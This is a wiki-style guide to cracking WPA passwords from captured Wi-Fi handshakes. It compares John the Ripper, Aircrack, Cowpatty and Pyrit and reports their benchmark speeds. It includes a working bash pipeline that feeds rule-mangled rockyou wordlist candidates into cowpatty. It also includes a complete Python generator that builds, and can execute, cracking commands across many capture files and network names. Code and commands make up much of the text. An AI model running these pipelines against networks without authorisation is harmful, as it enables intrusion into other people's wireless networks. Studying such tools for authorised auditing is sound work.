From charlesreid1

With a plethora of tools, files, and data being generated by wireless sniffing, how do you manage all of your files and options?

Extracting Passwords

The workflow for extracting passwords takes one of two forms:

  • airodump-ng to monitor and capture, Python to extract data from the captures, Python to create attack scripts, Python to process cap files
  • or besside-ng to vacuum up handshakes and put them into one cap file, with the besside-ng log telling you which networks' handshakes are in there

Part 2: Cracking Passwords

John the Ripper

You can use John the Ripper to crack WPA by itself: John the Ripper/WPA

John the Ripper only reads its own hash file format, so you have to first convert your cap files to hccap files, then run hccap2john on the hccap files to produce John the Ripper hash lines (one per handshake).

Your procedure is as follows:

  • Use cap2hccap to convert cap files into hccap files
  • Use hccap2john to convert hccap files into John the Ripper password files
  • Use Python to assemble John the Ripper password cracking commands
  • Use John the Ripper to crack WPA passwords

Aircrack

You can use Aircrack alone as your password cracker by feeding it a wordlist. Note that this is not a very good way to use Aircrack: it tries each word exactly as written, so your wordlist must already contain the passphrase verbatim. A better way is to pair it with another program that generates and mangles password candidates, like John the Ripper.

Aircrack + John the Ripper

You can use Aircrack and John the Ripper in combination to crack passwords. This setup uses John the Ripper to generate candidates from wordlists, but does so in a way that produces many variations per word, using a set of customized rules. This means that if your wordlist has the word "password", Aircrack by itself would only try "password", but with John the Ripper you can also try "password1982", "Password1234", "password!", "pASSWORD", and so on.

The procedure mirrors the Cowpatty pipeline below: John the Ripper emits candidates with --stdout, and Aircrack reads them from stdin by passing -w - in place of a wordlist file.

Cowpatty + John the Ripper

Cowpatty is yet another WPA cracking program. Like Aircrack, it can accept wordlists from stdin, meaning you can hook it up to John the Ripper. This lets you use John the Ripper for generating password guesses, and Cowpatty for testing them.

The call will look something like this:

#!/bin/bash
# Pipe John the Ripper's rule-mangled candidates straight into cowpatty.
set -eu

# bins
JOHNBIN="/root/codes/john/run/john"
COWPATTYBIN="/root/codes/cowpatty/bin/cowpatty"

# john parameters: the base wordlist, and the rule section from john.conf used to mangle it
WORDLIST="/root/codes/wordlists/rockyou.txt"
RULES="KoreLogicRulesAppendYears"

# cowpatty parameters: the capture holding the handshake, and the ESSID that handshake belongs to
CAPFILE="/root/dump/me.capfile"
ESSID="MyRouter"

# --stdout makes john print candidates instead of cracking; -f - makes cowpatty read them from stdin.
# Variables are quoted so ESSIDs and paths containing spaces survive word splitting.
"${JOHNBIN}" --wordlist="${WORDLIST}" --rules="${RULES}" --stdout \
    | "${COWPATTYBIN}" -f - -r "${CAPFILE}" -s "${ESSID}"

Of course, you can also use Python to generate these commands programmatically.

The strategy, then, is this:

  • Create a list of word files
  • Create a list of rules you want to use
  • Create a list of cap files
  • Create a list of router ESSIDs whose handshakes are contained in those cap files
  • Use Python to loop over each of these items and generate a john/cowpatty command
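The generator described by the strategy above, and the hccap2john step from the John-only procedure earlier on this page, as an added Python example (not code from this wiki). The tool names and flags are real (john --wordlist/--rules/--stdout, aircrack-ng -w - -e, cowpatty -f - -r -s, hccap2john); the binary paths, wordlists, rule names, capture files and ESSIDs are constructed placeholders, and the second rule name "Wordlist" is just john.conf's default rule section.

```python
"""Job generator for the john -> {aircrack-ng, cowpatty} pipelines and the John-only path.

Added example, not the charlesreid1 wiki's own code. Paths and targets are placeholders.
"""
import itertools
import shlex
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Hypothetical tool locations; adjust to your own build layout.
JOHN_BIN = "/root/codes/john/run/john"
HCCAP2JOHN_BIN = "/root/codes/john/run/hccap2john"
AIRCRACK_BIN = "aircrack-ng"
COWPATTY_BIN = "/root/codes/cowpatty/bin/cowpatty"


@dataclass(frozen=True)
class Target:
    """One handshake to attack: the capture, the ESSID whose handshake it holds,
    and (only for the John-only path) the .hccap already produced by cap2hccap."""
    capfile: str
    essid: str
    hccap: Optional[str] = None


def john_stdout(wordlist: str, rules: str) -> List[str]:
    """argv for John as a candidate generator: mangle `wordlist` with `rules`, print to stdout."""
    return [JOHN_BIN, f"--wordlist={wordlist}", f"--rules={rules}", "--stdout"]


def cracker_argv(tool: str, t: Target) -> List[str]:
    """argv for the consumer side of the pipe. Both tools read candidates from stdin when
    the dictionary argument is '-', and both need the ESSID to select the right handshake."""
    if tool == "aircrack":
        return [AIRCRACK_BIN, "-w", "-", "-e", t.essid, t.capfile]
    if tool == "cowpatty":
        return [COWPATTY_BIN, "-f", "-", "-r", t.capfile, "-s", t.essid]
    raise ValueError(f"unknown cracker: {tool}")


def _join(argv: Sequence[str]) -> str:
    return " ".join(shlex.quote(a) for a in argv)


def pipeline(tool: str, wordlist: str, rules: str, t: Target) -> str:
    """Shell-safe 'john ... --stdout | <cracker> ...' line. shlex.quote protects ESSIDs
    containing spaces or shell metacharacters (an ESSID like "Bob's Cafe" is common)."""
    return f"{_join(john_stdout(wordlist, rules))} | {_join(cracker_argv(tool, t))}"


def john_only(wordlist: str, rules: str, t: Target) -> List[str]:
    """Two commands for the John-alone path: hccap2john writes the hash line for the
    handshake, then john cracks that file directly with the same wordlist and rules."""
    if t.hccap is None:
        raise ValueError(f"{t.capfile}: no .hccap recorded; run cap2hccap on it first")
    hashfile = t.hccap + ".john"
    convert = f"{_join([HCCAP2JOHN_BIN, t.hccap])} > {shlex.quote(hashfile)}"
    crack = _join([JOHN_BIN, f"--wordlist={wordlist}", f"--rules={rules}", hashfile])
    return [convert, crack]


def generate_jobs(tool: str, wordlists: Sequence[str], rules: Sequence[str],
                  targets: Sequence[Target]) -> List[Tuple[str, str]]:
    """Cartesian product of wordlists x rules x targets, as (label, command) pairs.
    tool is 'aircrack', 'cowpatty', or 'john' (the hccap2john path)."""
    jobs: List[Tuple[str, str]] = []
    for wl, rule, t in itertools.product(wordlists, rules, targets):
        label = f"{tool}:{t.essid}:{wl.rsplit('/', 1)[-1]}:{rule}"
        cmds = john_only(wl, rule, t) if tool == "john" else [pipeline(tool, wl, rule, t)]
        jobs.extend((label, c) for c in cmds)
    return jobs


def run_jobs(jobs: Sequence[Tuple[str, str]], dry_run: bool = True) -> List[int]:
    """Print every command; execute them only when dry_run is False. Pipes and the
    redirect need a shell, which is why every argument was quoted when building them."""
    rcs: List[int] = []
    for label, cmd in jobs:
        print(f"# {label}\n{cmd}")
        if not dry_run:
            rcs.append(subprocess.run(cmd, shell=True).returncode)
    return rcs


if __name__ == "__main__":
    # Constructed sample inventory; none of these files exist.
    WORDLISTS = ["/root/codes/wordlists/rockyou.txt"]
    RULES = ["KoreLogicRulesAppendYears", "Wordlist"]
    TARGETS = [Target("/root/dump/me.capfile", "MyRouter", "/root/dump/me.hccap"),
               Target("/root/dump/cafe.cap", "Bob's Cafe")]
    run_jobs(generate_jobs("cowpatty", WORDLISTS, RULES, TARGETS))
```

Run it as-is to get a dry-run listing you can paste into a shell, or call run_jobs(..., dry_run=False) to execute sequentially. Because each pipeline's exit status is the cracker's, not John's, a successful crack that makes cowpatty or aircrack exit early is not reported as a failure.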


Pyrit

Oh yeah. Did we cover Pyrit yet?

Pyrit is for cracking passwords using the GPU. The expensive step in a WPA attack is deriving the PMK from each candidate passphrase (4096 rounds of PBKDF2-HMAC-SHA1, salted with the ESSID), and that is the step Pyrit offloads to the GPU, either attacking a capture directly or precomputing a PMK database for a given ESSID.


Picking Your Cracking Tool

Which tool should you use? Whichever one is fastest on your hardware, of course.

You might want to test them all out to see how fast they operate.

Benchmarking Aircrack

Aircrack clocks in as the fastest of the CPU-based crackers tested here, at about 1,200 keys per second.

See Aircrack/Benchmarking

Benchmarking Cowpatty

Cowpatty cracks at a rate of about 250 keys per second. It's the slowest of the bunch.

See Cowpatty/Benchmarking

Benchmarking John the Ripper

John the Ripper cracks at a rate of about 1,000 keys per second.

See John the Ripper/Benchmarking

Other Tools

Pyrit on a GPU can run about 100x faster than these CPU rates, on the order of 100,000-300,000 keys per second. That's roughly equivalent to cutting a year's worth of CPU work down to a few days.

The Outcome

The outcome is: USE AIRCRACK.

The best approach is to use John the Ripper to feed passwords to Aircrack.

The next best alternative is to use John the Ripper alone, although it is slightly slower than Aircrack.

You don't want to use Cowpatty unless you can improve its key testing rate with precomputed PMK tables (built with genpmk and passed via -d). Since the ESSID is the salt, such a table only pays off when it can be reused against several captures of the same ESSID.